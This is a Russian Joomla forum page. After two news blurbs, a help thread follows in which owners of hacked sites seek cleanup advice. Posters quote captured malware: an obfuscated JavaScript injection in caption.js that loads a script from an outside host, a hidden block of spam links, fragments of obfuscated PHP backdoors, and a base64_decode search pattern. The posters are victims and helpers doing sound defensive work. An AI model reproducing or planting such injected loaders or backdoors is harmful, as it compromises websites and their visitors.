Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 292314 Просмотров
*

zayzau86

  • Осваиваюсь на форуме
  • 48
  • 1 / 0
ок, спс
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
Для информации. 3 октября  какое-то скотво загадило Joomla шеллом.
Путь ...  httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example
base_db.php
Спойлер
[свернуть]
Антивирем макхоста эта дрянь определяется как "Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL"
« Последнее редактирование: 13.10.2014, 03:48:41 от dormidont »
*

wishlight

  • Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
*

ecolora

  • Завсегдатай
  • 1535
  • 171 / 2
  • творец
Внезапно обнаружил, что мои сайты взломали. Слава Богу отделался ссылкоразмещением, а не удалением файлов или еще чего похуже. У себя на каждом взломанном сайте обнаружил простой загрузчик файлов uploader.php и еще вот этот файл base.php (приложено) в папке с правами 331. Кому интересно разобраться, что он делает?
Я пытался, но дойдя до регулярного выражения, почему-то не могу продвинуться дальше.
Данный файл также обнаружен в других дирректориях (1-2 копии) и с одной из копий в директории лежит поддирректория temp_override с различными php файлами, картинками и файлами со ссылками и текстом (явно рекламными). Судя по всему маленькая копия сайта на php и HTML.
Кому интересно, могу дать папку для анализа.

Вот пример работы на чужом сайте:
http://нмолодёжь.рф/
http://нмолодёжь.рф/header.php?do=skachat-emulyator-dosbox-1

А вообще эта хрень установлена уже на многих сайтах:
https://www.google.ru/search?q=joomla+2.5.27&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:ru:official&client=firefox-a&channel=sb&gfe_rd=cr&ei=YRVGVJz5F4qANN6VgpgH#newwindow=1&safe=off&rls=org.mozilla:ru:official&channel=sb&q=inurl:temp_override

У себя вычищаю потихоньку (несколько сайтов).
« Последнее редактирование: 21.10.2014, 13:31:09 от ecolora »
Я рифме друг словесной. Тут
Свой упражняю словоблуд:
Блог Ecolora
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Цитировать
что он делает?
Бэкдор это (WSO Shell 2.5).
Разработка, доработка расширений для Joomla!
*

Frediks

  • Новичок
  • 2
  • 0 / 0
Доброго всем времени суток!
 !Умные дядьки помогите с решением одного вопроса, а именно на сайте периодически появляется скрипт выводящий порно рекламу в виде баннеров, выводит постояно на одних и тех же страницах, антивирус результатов не дает никаких. Решаю проблему временно так - когда появляется реклама то просто тупо открываю страницу в редакторе и чищу контент от стороннего кода тогда на время пропадает.
Что еще заметил после чистки контента скрипт не отображается в коде страницы но виден через FireBug, тоесть FireBug его показыает в коде страницы но по факту (если смотреть код страницы на прямую) его нет... Не могу понять где и что его выводит... Грешил и на редактор и на сам FireBug. Суждения сводились к тому зараза где то в редакторе, и стоит открыть редактор для редактирования контента как он добавляет в него свой пакостный скрипт,. вообщем без определенного опыта (которого у меня увы практически нет) тут не разберешься. Буду очень признателен за помощь! вот сам скрипта в фаербаге
Спойлер
[свернуть]
в коде страницы его сейчас нет. где и как найти пакость которая его выводит?
может сталкивался кто то уже с подобным?
« Последнее редактирование: 18.11.2014, 10:03:45 от Frediks »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Пробуй без редактора. Кстати а редактор стандартный ?
*

Frediks

  • Новичок
  • 2
  • 0 / 0
Пробуй без редактора. Кстати а редактор стандартный ?
нет редактор JCE 2.4.3. в смысле вобще без редакора?
*

silenzio

  • Новичок
  • 2
  • 0 / 0
Друзья помогите, есть 2 сайта на Joomla 2.5 (по моему) на одном хостинге.  Сначала ругался Яндекс и хостинг на вирусы, блокировал исходящую почту (интернет магазины), потом вообще пропал доступ даже к админке. На хостинге файлы есть я смотрел. В общем я не профессинал, как вы поняли, нужна помощь, пишите, договоримся. 
*

Tsepelev

  • Новичок
  • 4
  • 0 / 0
Всем привет !Такой случай у меня на сайте левая информация, и я не могу ее найти помогите пожалуйста ни охото начинать все заново.

<div style="height: 4px; overflow: hidden;position:absolute;"><span style="line-height:20px;"><a href="http://kredit-nalichnymi.info/" target="_blank">заявка на кредит онлайн</a>.<br> <a href="http://online-zayavka-na-kredit.com/" target="_blank">онлайн заявка на кредит наличными</a>.</span></div><div style="height: 4px; overflow: hidden;position:absolute;"><span style="line-height:20px;">Новые <a href="http://joomlan.ru/" target="_blank" >шаблоны для Joomla 3</a> на joomlan.ru.<br> <a href="http://my-wordpress.org" target="_blank">шаблоны Wordpress</a> </span></div><div class="blog"><article class="dd-post"><div class="dd-postcontent clearfix"><div class="category-desc"></div>
*

AlekVolsk

  • Гуру
  • 6913
  • 416 / 4
index.php шаблона смотрите
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Всем привет !Такой случай у меня на сайте левая информация, и я не могу ее найти помогите пожалуйста ни охото начинать все заново.
не используйте варез, и будет счастье
*

Tsepelev

  • Новичок
  • 4
  • 0 / 0
не используйте варез, и будет счастье
А как без шаблонов быть?
*

Tsepelev

  • Новичок
  • 4
  • 0 / 0
index.php шаблона смотрите
Смотрел и в базе смотрел, как он на сайте появляется не пойму, я весь сайт скачал прошарил нет там ни чего.Видать правда такой шаблон палевый, что придется все переделывать.
*

Tsepelev

  • Новичок
  • 4
  • 0 / 0
Может кто глянет и поможет, единственная заморочка, сайт kinozalon.ru с 601 строчки, пожалуйста.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Может кто глянет и поможет, единственная заморочка, сайт kinozalon.ru с 601 строчки, пожалуйста.
Уже поздно глядеть, вам чистить сайт надо и устранять все после установки вареза, помочь конечно можно от 2500р. голая Joomla, полная стоимость оценивается через предоставленный ftp доступ.
*

VasiliyIam

  • Новичок
  • 1
  • 0 / 0
 flyingspook need help , готов оплатить. skype: VasiliyIam
*

m4rkus

  • Новичок
  • 3
  • 0 / 0
Всем привет.
Пока не могу решить проблему с мобильным редиректом.
Прописывается постоянно в /media/system/js/caption.js
вот такой кусок:
Код
//hHXLvFEQd2Xxwk
v=0;vx='Code';vv='wri';
while(v<88)document[vv+'te'](String['fromChar'+vx]
('=tdsjqu!tsd>#iuuq;00g2qspn/sv0xq.benjo0jnbhft0tubu/qiq#!uzqf>#ufyu0kbwbtdsjqu#?=0tdsjqu?'['char'+vx+'At'](v++)-1))
//kHWRukCaH8KRoRww
результат работы
Код
<script src="http://f1prom.ru/wp-admin/images/stat.php" type="text/javascript">
</script>

Может кто сталкивался.Как лечить? Через какую дыру пролазиет.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Запрет 444 на запись в файл ставил ?
А что предпринимал по устранению, нахождению уязвимости ?
*

Vasja555

  • Захожу иногда
  • 76
  • 1 / 1
Я вот почитал первый стартовый пост и думается а как там что то изменится если в принципе чтобы изменить текс файла PHP нужен доступ к серверу.
Это или пароли кривые
или прямым текстом в файле хранятся  :o  crazy!
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Я вот почитал первый стартовый пост и думается а как там что то изменится если в принципе чтобы изменить текс файла PHP нужен доступ к серверу.
Это или пароли кривые
или прямым текстом в файле хранятся  :o  crazy!
Увы, но вы очень и очень ошибаитесь!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Я вот почитал первый стартовый пост и думается а как там что то изменится если в принципе чтобы изменить текс файла PHP нужен доступ к серверу.
Это или пароли кривые
или прямым текстом в файле хранятся  :o  crazy!
интернет изначально создавался, существует и будет существовать полностью открытым, и это означает что нету ни чего защищенного
*

Vasja555

  • Захожу иногда
  • 76
  • 1 / 1
ну так нечего открывать все порты на сервере если нужен только 80
и права на папку и владельцы придумали зрая
и вообще кто дает 777? :D
*

Vasja555

  • Захожу иногда
  • 76
  • 1 / 1
Запрет 444 на запись в файл ставил ?
А что предпринимал по устранению, нахождению уязвимости ?

444 это запрет или права?
если права то зачем права другим пользователям не отнесенных к группе?

Эх что там не работает 777 лучше всего так красиво пишется. 3 по 7

И в базу надо ходить только под рутом без рута не кошерно.
а лучше сразу на сайте выставить рута чтобы все видели  :D
*

m4rkus

  • Новичок
  • 3
  • 0 / 0
Запрет 444 на запись в файл ставил ?
А что предпринимал по устранению, нахождению уязвимости ?
444 поставил.Обновил JCE и ALLvideo. Буду дальше смотреть. Появиться отпишусь.
Спасибо.
*

m4rkus

  • Новичок
  • 3
  • 0 / 0
444 поставил.Обновил JCE и ALLvideo. Буду дальше смотреть. Появиться отпишусь.
Спасибо.
Не помогло.Опять прописался и права на файл в 777 установил
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Не помогло.Опять прописался и права на файл в 777 установил
у вас на сайте шел и вам его надо найти удалить и обновить все расширения и движок, если что то не возможно обновить то закрыть все возможные уязвимости
*

Polosat

  • Захожу иногда
  • 202
  • 7 / 0
  • Мечты - это то, из чего сделано будущее
На нескольких сайтах на разных аккаунтах аналогичная уязвимость, причину понять до сих пор не могу, т.к. через 2-3 дня оно выскакивает опять в разных файлах, т.е. не могу найти исполняемый файл, может кто уже избавлялся от аналогичного и подскажет, начало вирусного файла:

Цитировать
1: ./administrator/components/com_tags/tables/.menu.php
<?php $vAEEE99 = Array('1'=>'u', '0'=>'5', '3'=>'v', '2'=>'7', '5'=>'t', '4'=>'L', '7'=>'y', '6'=>'Y', '9'=>'W', '8'=>'g', 'A
2: ./administrator/components/com_banners/models/error92.php
<?php $vJ11WJD = Array('1'=>'d', '0'=>'m', '3'=>'b', '2'=>'o', '5'=>'4', '4'=>'x', '7'=>'T', '6'=>'p', '9'=>'i', '8'=>'C', 'A
3: ./modules/mod_finder/.system.php
<?php $vW0HWE8 = Array('1'=>'Y', '0'=>'v', '3'=>'R', '2'=>'l', '5'=>'V', '4'=>'1', '7'=>'B', '6'=>'J', '9'=>'S', '8'=>'K', 'A
4: ./modules/mod_users_latest/tmpl/user.php
<?php $vNAK6CG = Array('1'=>'y', '0'=>'6', '3'=>'c', '2'=>'X', '5'=>'Q', '4'=>'L', '7'=>'2', '6'=>'u', '9'=>'n', '8'=>'R', 'A
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
а версия Joomla актуальная ?
Встречается в скрипте ?  
Код
return base64_decode(
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
а версия Joomla актуальная ?
Встречается в скрипте ? 
Код
return base64_decode(

Версия скорей всего не актуальная

Ищите шелы, удаляйте и обновляйте все, начало вирусного файла бывает разнообразными и каждый случай индивидуален, сканируйте файлы сайта, сканеры поиска и придуманы для этих целей
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2520
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71450
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3501
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5114
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3522
Последний ответ 22.02.2022, 11:38:15
от AlexP750